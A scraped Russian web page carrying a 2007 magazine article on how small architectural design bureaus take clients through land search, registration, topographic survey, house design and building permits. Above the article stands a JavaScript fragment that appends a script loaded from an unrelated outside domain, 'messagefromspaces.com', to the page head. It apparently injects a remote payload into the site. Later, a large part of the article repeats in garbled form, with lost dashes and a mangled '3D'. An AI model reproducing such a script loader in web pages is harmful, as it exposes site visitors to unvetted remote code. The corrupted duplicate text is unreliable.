, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Дорога к Дому

В глубине души все мы немного дизайнеры, стилисты, проектировщики, архитекторы, в общем, творцы. Но на пути к дому вашей мечты не обойтись без профессионалов, особенно на этапе проектирования.
Текст: Наталья Струговщикова (Фрагмент статьи в журнале Hi Home 09/2007)

Раньше проектированием общественных и частных строений занимались крупные проектные институты, на смену которым пришли небольшие проектные бюро. Их преимущество в том, что они стремятся максимально облегчить жизнь своим клиентам, вплоть до осуществления полного цикла услуг, сбора справок, подачи заявлений. Система работает по знакомому принципу — дополнительные услуги за дополнительную плату. Удобный подход для занятых людей, не желающих тратить время в очередях различных госинстанций.

Штат проектной организации может включать от пяти до тридцати человек, главные из которых — архитектор, инженер, бухгалтер. Инженеры по вентиляции, инженеры-конструкторы, дизайнеры, геологи и другие специалисты чаще всего являются субподрядчиками. В некоторых организациях внештатными являются почти все сотрудники. Таким образом, например, работает ИП Заверухина, имея в штате только одного ответственного помощника. «Когда есть определенный опыт в области проектирования, наработки и связи, держать штат из 30 человек невыгодно, ведь большая часть предлагаемых услуг является дополнительной. Достаточно знать, что на людей, с которыми я сотрудничаю не один год, можно положиться», — говорит Эляна Заверухина.

По словам специалистов, к услуге исключительно проектирования дома прибегает все меньше людей. Теперь заказчик с помощью бюро может начать с поиска земельного участка, а закончить обустройством интерьера уже построенного дома. Поговорим о каждом из этапов более подробно. Клиентов, обращающихся в проектное бюро без наличия земли, немного, но, если такие находятся, руководитель проекта прибегает к помощи риэлторских агентств, занимающихся подбором возможных вариантов. Здесь важно учесть все пожелания заказчика — район, тип будущей постройки (дом, коттедж, дача), чтобы сделать поиск максимально быстрым и эффективным.

Следующий шаг — юридическая сторона вопроса — получение в юстиции свидетельства о регистрации права на землю собственника или арендатора сроком на 49 лет. Для этого владелец должен предоставить пакет документов: технический паспорт из БТИ, справки о принадлежности и отсутствии ареста, правоустанавливающий документ. Сбор необходимых документов и сама регистрация — это процесс длительный и трудоемкий, который может затянуться не на один месяц. Комментирует Эляна Заверухина: «Естественно, человек, которому не приходилось прежде сталкиваться с подобными вопросами, не знает, в какой последовательности оформлять документы и в каких учреждениях получать нужные справки. Много времени при этом тратится впустую. А для нас это часть отлаженного механизма работы, с которой мы справляемся за месяц. Зная наверняка, что все сделало верно, мы ожидаем получения свидетельства как формального разрешения, работая уже непосредственно над проектированием».

Свидетельство из юстиции дает официальное право на проектирование будущего строения. Но, прежде чем перейти к нему, необходимо осуществить топографическую съемку участка.
Топографическая съемка — это комплекс геодезических работ, выполняемых на местности для создания топографических карт и планов. Различают топографические работы для составления планов крупных масштабов (1:500, 1:1000, 1:2000, 1:5000) и мелких (1:10000, 1:25000 и мельче). Съемке и отображению на топографических планах подлежат все элементы ситуации местности, существующей застройки, благоустройства, подземных и наземных коммуникаций. Как правило, она включает в себя съемку подземных коммуникаций (газ, канализация, электричество). Результат топографической съемки — топографический план — передается заказчику в графическом виде (на бумаге) или в цифровом (электронном).

Специалисты не рекомендуют торопиться с графическим проектированием, не обсудив подробно все детали с заказчиком. Важно знать, каким он представляет дом своей мечты: с садом, где будут цвести декоративные растения и струиться фонтаны, или с огородом, где он будет выращивать овощи и фрукты; какие комнаты он хотел бы иметь — квадратные или вытянутые; какая крыша кажется ему более привлекательной — скатная или плоская; будут ли в доме подвал, мансарда, балконы, гараж и т.д. Лучше потратить время на разговоры до создания предварительных эскизов, чем подвергать их бесконечным правкам после. Что касается визуализации, то большинство архитекторов вычерчивают их на компьютере в специализированной программе Autocad. По желанию клиенту предлагают более трудоемкую и дорогостоящую ЗD-визуализацию, позволяющую увидеть будущее строение в трехмерном объеме — как в живую.

Если проект утвержден заказчиком, то в отдел районной, городской архитектуры подается заявление на разрешение строительства. Разрешение на строительство — документ, который подтверждает соответствие проектной документации требованиям градостроительного плана земельного участка и дает застройщику право на осуществление строительства.

ИП Эляна Заверухина:
Часто люди, оставшиеся недовольными результатами строительства и откатывающиеся от авторского надзора, ошибочно полагают, что виноват архитектор, якобы
плохо спроектировавший дом, а не прораб, самостоятельно изменивший план проекта, или непрофессионализм строителей. Разработчик проекта — лучший его знаток, и поэтому только он может
правильно внести коррективы в процессе строительства, с учетом новых пожеланий клиента.

На данном этапе заказчик может прибегнуть к дополнительной услуге проектного бюро, оформив доверенность на руководителя, заботой которого станет сбор документов и само получение разрешения.

Свидетельство из юстиции дает официальное право на про­ектирование будущего строения. Но, прежде чем перейти к нему, необходимо осуществить топографическую съемку участка.

Топографическая съемкаэто комплекс геодезических ра­бот, выполняемых на местности для создания топографи­ческих карт и планов. Различают топографические работы для составления планов крупных масштабов (1:500, 1:1000, 1:2000, 1:5000) и мелких (1:10000, 1:25000 и мельче). Съемке и отображению на топографических планах подлежат все элементы ситуации местности, существующей застройки, благоустройства, подземных и наземных коммуникаций. Как правило, она включает в себя съемку подземных коммуни­каций (газ, канализация, электричество). Результат топо­графической съемкитопографический планпередается заказчику в графическом виде (на бумаге) или в цифровом (электронном).

Специалисты не рекомендуют торопиться с графическим проектированием, не обсудив подробно все детали с за­казчиком. Важно знать, каким он представляет дом своей мечты: с садом, где будут цвести декоративные растения и струиться фонтаны, или с огородом, где он будет выращивать овощи и фрукты; какие комнаты он хотел бы иметьква­дратные или вытянутые; какая крыша кажется ему более привлекательнойскатная или плоская; будут ли в доме подвал, мансарда, балконы, гараж и т.д. Лучше потратить


время на разговоры до создания предварительных эскизов, чем подвергать их бесконечным правкам после. Что касается визуализации, то большинство архитекторов вычерчивают их на компьютере в специализированной про­грамме Autocad. По желанию клиенту предлагают более трудоемкую и дорогостоящую Зй-визуализацию, позволяю­щую увидеть будущее строение в трехмерном объемекак вживую.

Если проект утвержден заказчиком, то в отдел районной, городской архитектуры подается заявление на разрешение строительства. Разрешение на строительстводокумент, который подтверждает соответствие проектной документации требованиям градостроительного плана земельного участка и дает застройщику право на осуществление строительства.

Оставить комментарий

Проекты
открыть | закрыть
Случайное фото
Get the Flash Player to see the slideshow.